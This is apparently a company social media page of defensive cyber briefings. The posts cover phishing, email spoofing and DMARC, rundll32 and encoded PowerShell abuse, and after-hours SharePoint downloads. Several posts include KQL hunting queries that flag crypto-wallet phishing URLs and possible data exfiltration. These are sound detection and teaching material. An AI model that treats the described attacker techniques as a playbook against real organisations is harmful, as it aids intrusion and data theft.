GEMXIT PTY LTD

GEMXIT PTY LTD GEMXIT PTY LTD - GEMXIT UK LTD
Develop IT.. Solve IT.. GEMXIT

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing“The timeline told the story…”“…because the logs already knew.”👉 Sign in at 0...
04/06/2026

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing

“The timeline told the story…”
“…because the logs already knew.”

👉 Sign in at 08:12
👉 Privilege escalation at 08:24
👉 Data access at 08:27
👉 Lateral movement at 08:31

☕ Individually, each event looked normal.
Together, they revealed the entire attack path.

🔍 What we found:

• Successful sign-in activity
• Privilege changes shortly afterwards
• Sensitive data access
• Follow-on device and network activity
• Events spread across multiple Microsoft security tables

Nothing screamed "incident."
In fact, the dashboard was greener than a frog in a lettuce factory.

But together... the timeline changed everything.

🧠 So we didn't trust one alert. We built the timeline.
Even simple investigation pivots can expose the story:

IdentityLogonEvents

| where Timestamp > ago(24h)

| project Timestamp,

AccountUpn,

IPAddress,

DeviceName,

ActionType

| order by Timestamp asc

👉 Sometimes the evidence isn't missing.
It's simply scattered across different tables, devices and timestamps.

💥 What this kind of activity can indicate:
• Account compromise
• Privilege escalation
• Suspicious data access
• Lateral movement
• Post-authentication attacker activity
• Hidden relationships between seemingly unrelated events

No single event told the full story.
The timeline did.

🔐 The takeaway:

"The event looked normal..."
"...until the next event explained it."

👉 Modern investigations are not just about alerts.
They are about connecting behaviour across time.

🧭 Built on:

Microsoft Defender XDR | Microsoft Sentinel | Microsoft Entra ID | KQL

🕵️‍♂️ Agent Foskett's note:

The sign-in looked normal.
The data access looked normal.
The lateral movement looked normal.
The timeline didn't.

And that's why attackers hate timestamps.

Develop IT.. Protect IT.. GEMXIT

GEMXIT PTY LTD | GEMXIT UK LTD

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing“Rundll32 Looked Legitimate”👉 Signed Microsoft binary👉 Running from System32👉...
29/05/2026

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing

“Rundll32 Looked Legitimate”
👉 Signed Microsoft binary
👉 Running from System32
👉 No malware alert
👉 No user complaint

☕ Everything looked normal.
The dashboards were green.
The coffee was hot.
The SOC was quiet.

Which is usually when Agent Foskett gets suspicious. 😅

The process was:
rundll32.exe

A completely legitimate Windows component.
Trusted.
Common.
Expected.

And that’s exactly why attackers love it.
Because most people see:

“Oh… that’s just Windows doing Windows things.”

But in Microsoft Defender XDR, the behaviour told a different story.

🔍 What we found:
• Unusual command-line arguments
• DLL ex*****on from temp folders
• Suspicious parent process chain
• Unexpected outbound connections
• Trusted process… suspicious behaviour

No high-severity alert triggered.
Because technically… the binary was legitimate.

🧠 This is the shift in modern threat hunting:

It’s no longer:
❌ Did malware execute?

It’s now:
✅ What was the trusted process actually doing?

That’s why behavioural analysis matters across:
• Microsoft Defender XDR
• Advanced Hunting
• DeviceProcessEvents
• DeviceNetworkEvents
• KQL investigations

Attackers rely on trust:
• PowerShell looks normal
• Logins appear legitimate
• MFA succeeds
• Dashboards stay green
• And rundll32 quietly blends in

Meanwhile, Agent Foskett at 11:47 PM:
☕🕵️‍♂️
"Yeah… you’re not fooling me."

🛡️ Takeaway:
The filename is only the beginning of the story.
Behaviour is where the truth lives.

New Agent Foskett investigation:
👉 “Rundll32 Looked Legitimate”

Develop IT. Protect IT. GEMXIT

GEMXIT PTY LTD | GEMXIT UK LTD

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing “The Disney email looked real…” “…but Disney never sent it.”👉 Correct brandi...
21/05/2026

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing

“The Disney email looked real…”

“…but Disney never sent it.”

👉 Correct branding

👉 Professional layout

👉 Trusted subscription theme

👉 Urgent “update your information” request

☕ Everything looked legitimate… until we checked the sender.

MembershipCenterD+

Not Disney.

Not a Disney-owned domain.

Not even remotely related.

🔍 What we found:

• Fake Disney subscription renewal email

• Highly convincing branding and formatting

• Suspicious sender domain (academic domain, not Disney)

• SendGrid tracking links used for delivery

• External redirect chains via third-party infrastructure

• Urgency tactics designed to trigger immediate action

At first glance, nothing looked malicious.

Because technically… it wasn’t obvious.

💥 This wasn’t sloppy phishing. This was deliberate trust engineering.

🧠 So we didn’t trust the logo - we investigated the identity.

Because identity signals don’t lie - even when branding does.

Even simple Microsoft Defender pivots can expose suspicious sender behaviour:

EmailEvents

| where Subject has "Disney"

or Subject has "subscription"

| project Timestamp,

SenderFromAddress,

SenderMailFromAddress,

RecipientEmailAddress,

AuthenticationDetails,

DeliveryAction

👉 The branding looked trusted.

👉 The infrastructure didn’t.

💥 What this kind of activity can indicate:

• Brand impersonation phishing

• Redirect-chain abuse

• Sender mismatch attacks

• DMARC/SPF alignment failures

• Social engineering campaigns

• Credential harvesting attempts

No malware required.

🔐 The takeaway:

“The email looked legitimate…”

“…but the trust relationship wasn’t.”

👉 Modern phishing no longer looks suspicious

👉 It blends in perfectly

👉 And waits for users to trust before they verify

🧭 Built on:

Microsoft Defender XDR | Microsoft Sentinel | Microsoft Entra ID

🧩 Quick check:

Would this email pass your first glance test?

Or would you check the sender before the click?

🕵️‍♂️ Agent Foskett’s note:

The logo earned trust.

The sender didn’t deserve it.

Develop IT.. Protect IT.. GEMXIT

GEMXIT PTY LTD | GEMXIT UK LTD

🚨 Agent Foskett Briefing // Certification RenewedMicrosoft Certified: Security Operations Analyst AssociateRenewed succe...
16/05/2026

🚨 Agent Foskett Briefing // Certification Renewed

Microsoft Certified: Security Operations Analyst Associate

Renewed successfully through November 2027. ✅

Turns out spending unhealthy amounts of time staring at KQL queries, EmailEvents, SigninLogs, and suspicious PowerShell activity has finally paid off again. 😂

But the real value of security operations was never the certification itself.

It’s learning how to interpret the signals that most organisations overlook.

The strange sign-in nobody investigated.

The DMARC failure that still got delivered.

The “low severity” alert that definitely wasn’t low severity.

The PowerShell event hidden inside 400,000 normal log entries.

The after-hours SharePoint download that looked harmless… until it wasn’t.

Over the years, I’ve spent countless hours working across:

• Microsoft Defender XDR

• Microsoft Sentinel

• Entra ID

• KQL investigations

• Identity and email security analysis

Somewhere along the way, Agent Foskett accidentally became a real thing too… which still sounds ridiculous when I say it out loud. 😂

That experience is exactly why I continue building the Agent Foskett cyber briefings through GEMXIT.

Because modern security isn’t just about having dashboards.

It’s about understanding what the data is trying to tell you.

And occasionally keeping your threat hunting skills sharper than a hedgehog on espresso. 🦔☕🔥

Develop IT. Protect IT. GEMXIT.

GEMXIT PTY LTD | GEMXIT UK LTD

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing“The file was downloaded…”“…at 2:14AM.”👉 No malware.👉 No alert.👉 Just… a file...
15/05/2026

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing
“The file was downloaded…”
“…at 2:14AM.”
👉 No malware.
👉 No alert.
👉 Just… a file leaving the environment.
☕ Everything looked normal — until it didn’t.
________________________________________
🔍 What we found:
• Legitimate user account
• SharePoint file download
• Activity outside business hours
• No historical pattern of after-hours access
No alerts triggered.
Because technically… nothing was “malicious.”
________________________________________
🧠 So we didn’t trust alerts, we hunted behaviour.
Even a simple query can expose this:
AuditLogs
| where Operation == "FileDownloaded"
| extend Hour = datetime_part("hour", TimeGenerated)
| where Hour < 6 or Hour > 20
| project TimeGenerated, UserId, ClientIP
👉 That’s often all it takes to find something that shouldn’t exist.
________________________________________
💥 What this kind of activity can indicate:
• Insider data exfiltration
• Compromised accounts
• Token/session misuse
• Users preparing to leave
No malware required.
________________________________________
🔐 The takeaway:
“The download wasn’t blocked…”
“…because nothing about it looked dangerous.”
👉 Modern attacks don’t always break in.
Sometimes… they just take data out.
________________________________________
🧭 Built on:
Microsoft Sentinel | Microsoft Defender for Cloud Apps | Microsoft 365 Purview
________________________________________
🕵️‍♂️ Agent Foskett’s note:
The logs already knew.
We just had to ask the right question.

Develop IT.. Protect IT.. GEMXIT
GEMXIT PTY LTD | GEMXIT UK LTD

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing“Apparently, GEMXIT just won $7,146,325.16…”“…from a crypto reward system we ...
07/05/2026

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing

“Apparently, GEMXIT just won $7,146,325.16…”

“…from a crypto reward system we never joined.”

☕ Righto then.

This email had everything attackers love:

👉 A massive dollar amount

👉 Urgency

👉 Crypto rewards

👉 Wallet connection instructions

👉 “Proceed anyway”

👉 WhatsApp support

👉 Fake confidentiality wording

👉 And my own email address is included to make it feel personal

But here’s the real lesson:

This wasn’t clever because it looked professional.

It was clever because it tried to make the victim act before thinking.

The attacker didn’t ask for a password.

They asked for something better:

👉 Connect a crypto wallet

👉 Approve access

👉 Enter a “payment code”

👉 Follow instructions outside normal business systems

That’s how modern scams work.

They don’t always break in.

Sometimes they simply convince you to open the door.

🔍 What we would look for in Microsoft Defender

EmailEvents

| where Subject has_any ("PENDING PAYMENT", "UNCLAIMED REWARDS", "Airdrop")

| project Timestamp, SenderFromAddress, SenderFromDomain, RecipientEmailAddress, Subject, DeliveryAction, ThreatTypes

Then pivot into URLs:

EmailUrlInfo

| where Url has_any ("wallet", "claim", "airdrop", "crypto", "whatsapp")

| project Timestamp, NetworkMessageId, Url

🧠 Agent Foskett’s rule

If an email says:

“Proceed anyway”

That’s usually your sign to do the exact opposite.

Security isn’t just about blocking malware.

It’s teaching people to recognise when the story doesn’t make sense.

Develop IT. Protect IT. GEMXIT.

GEMXIT PTY LTD | GEMXIT UK LTD

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing“The email looked legitimate…”“…but it was never from us.”👉 That’s when thing...
01/05/2026

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing

“The email looked legitimate…”
“…but it was never from us.”

👉 That’s when things stop making sense.
The sender felt familiar
The message made sense
Nothing triggered suspicion
☕ Just another normal email…
until we looked at the data.
________________________________________
🔍 What’s really happening
This isn’t always a breach.
👉 It’s spoofing
Attackers don’t need access
They don’t need credentials
👉 They just need trust
Even with MFA in place…
👉 If a message is trusted, the damage is already done
________________________________________
🧠 Agent Foskett’s mindset
Don’t ask:
❌ “Did something fail?”
Ask:
👉 What did this message pretend to be?
👉 Who trusted it?
👉 Should it have been trusted at all?
________________________________________
💻 How we prove it
We don’t guess… we investigate.
Using Microsoft Defender:
• EmailEvents
• AuthenticationDetails
• Sender alignment
👉 We build the full authentication story
________________________________________
💥 What that reveals
• Emails that look internal… but aren’t
• Messages delivered despite failed checks
• Campaigns hiding in plain sight
👉 No alerts. Just behaviour.
________________________________________
⚠️ The reality
Most environments don’t get hacked first…
👉 They get trusted first
________________________________________
🚀 Takeaway
If your security relies on:
👉 “It looked fine”
You’ve already lost.
👉 Would you have trusted this email?
________________________________________
Develop IT. Protect IT. GEMXIT

GEMXIT PTY LTD | GEMXIT UK LTD

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing“The email came from me…”“…but I never sent it.”👉 That’s when you know someth...
23/04/2026

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing

“The email came from me…”

“…but I never sent it.”

👉 That’s when you know something’s off.

No breach.

No login alert.

No suspicious sign-ins.

☕ Just a normal day…

until you email yourself.

🔍 What actually happened?

An email landed in the inbox:

• ✅ From: my own address

• ✅ Looked legitimate (DocuSign notification)

• ❌ “View Document” button masked a malicious link

• ❌ Redirect chain to an unrelated external domain

No compromise.

No mailbox access.

💡Just spoofing.

💥 The trick attackers use

They don’t always hack accounts.

Sometimes…

they just pretend to be you.

📨 SMTP doesn’t verify identity by default.

So attackers can forge:

• Your domain

• Your email address

• Your identity

👉 And send it to you…

or worse… your clients.

🧠 Why this works

Because it breaks your instinct:

“If it came from me… it must be safe.”

That moment of hesitation?

That’s the gap attacker’s exploit.

🛠️ What we checked (before panicking)

We didn’t assume breach.

We verified:

• ❌ No unusual sign-ins in Microsoft Entra ID

• ❌ No mailbox rules or forwarding

• ❌ No suspicious activity in Microsoft Defender

👉 So we shifted mindset:

Not compromise…

Impersonation.

🔐 The controls that actually matter

This is where most environments fall short.

✅ SPF

Defines who can send mail for your domain

✅ DKIM

Cryptographically signs your emails

🚨 DMARC (the critical control)

Tells the world what to do when it’s fake

Without DMARC enforcement:

👉 Spoofed emails still get delivered

👉 Even when SPF and DKIM fail

💡 The reality

Attackers don’t always break in.

Sometimes… they just:

• Borrow your name

• Forge your identity

• Wait for someone to trust it

🧪 The real test

Ask yourself:

👉 If an email came from your own domain…

👉 Would your environment trust it?

Or block it?

🕵️‍♂️ Agent Foskett Insight

“The email looked legitimate…

because identity wasn’t being verified.”

👉 Security isn’t just detection anymore.

It’s trust enforcement.

🔒 Final thought

If DMARC isn’t set to reject…

👉 You don’t control your identity.

Attackers do.

Develop IT. Protect IT. GEMXIT.



GEMXIT PTY LTD | GEMXIT UK LTD

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing“Low confidence.”“Informational.”“No automated action.”👉 Probably nothing… ri...
16/04/2026

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing
“Low confidence.”
“Informational.”
“No automated action.”

👉 Probably nothing… right?
That’s exactly how real incidents begin.
No panic.
No ticket.
No escalation.
☕ Just another signal in Microsoft Defender XDR.
________________________________________
🔍 But something didn’t sit right.
A single alert:
• Suspicious PowerShell ex*****on
• Encoded command (-enc)
• User context (not system)
• No remediation triggered
Most teams would:
✅ Acknowledge
✅ Close
✅ Move on
________________________________________
💡 This is what attackers rely on
They don’t always bypass your tools.
Sometimes… they just need you to ignore them.
________________________________________
🧠 So we hunted the behaviour - not the alert.
👉 What actually ran?
👉 Who ran it?
👉 How was it executed?
Result:
• Encoded PowerShell
• Obfuscated command
• Executed on a user workstation
Still… “informational.”
________________________________________
🧠 Next pivot: Did it talk out?
We found:
• Outbound traffic from PowerShell
• Same device
• Same user context
Now it’s not just ex*****on…
👉 It’s ex*****on + communication
________________________________________
🧠 Final pivot: Identity
In Microsoft Sentinel + Microsoft Entra ID logs:
• Successful sign-in
• New/unusual location
• Within minutes of ex*****on
________________________________________
👉 Now we have a chain:
Process → Network → Identity → Time correlation
Individually? Benign.
Together? 🚨 Suspicious.
No alert stitched this together.
No incident created.
No rule triggered.
________________________________________
💬 This is the gap
❌ Alert-driven security
✅ Context-driven investigation
Defender detects signals.
Sentinel gives visibility.
👉 But neither replaces:
• Investigation
• Curiosity
• Experience
________________________________________
🎯 The real question isn’t:
“Did I get an alert?”
It’s:
👉 Did I understand what it meant?
________________________________________
🕵️‍♂️ Agent Foskett Insight
“The alert wasn’t ignored…
it just wasn’t understood.”
________________________________________
Develop IT. Protect IT. GEMXIT
GEMXIT PTY LTD | GEMXIT UK LTD

Address

Suite 8, Level 1, 33 Flemington Road, North Melbourne
Evanston, SA
3051

Opening Hours

Monday 5am - 10pm
Tuesday 5am - 10pm
Wednesday 5am - 10pm
Thursday 5am - 10pm
Friday 5am - 10pm
Saturday 4am - 10pm
Sunday 4am - 10pm

Telephone

+611300951505

Website

Alerts

Be the first to know and let us send you an email when GEMXIT PTY LTD posts news and promotions. Your email address will not be used for any other purpose, and you can unsubscribe at any time.

Shortcuts

Share

Category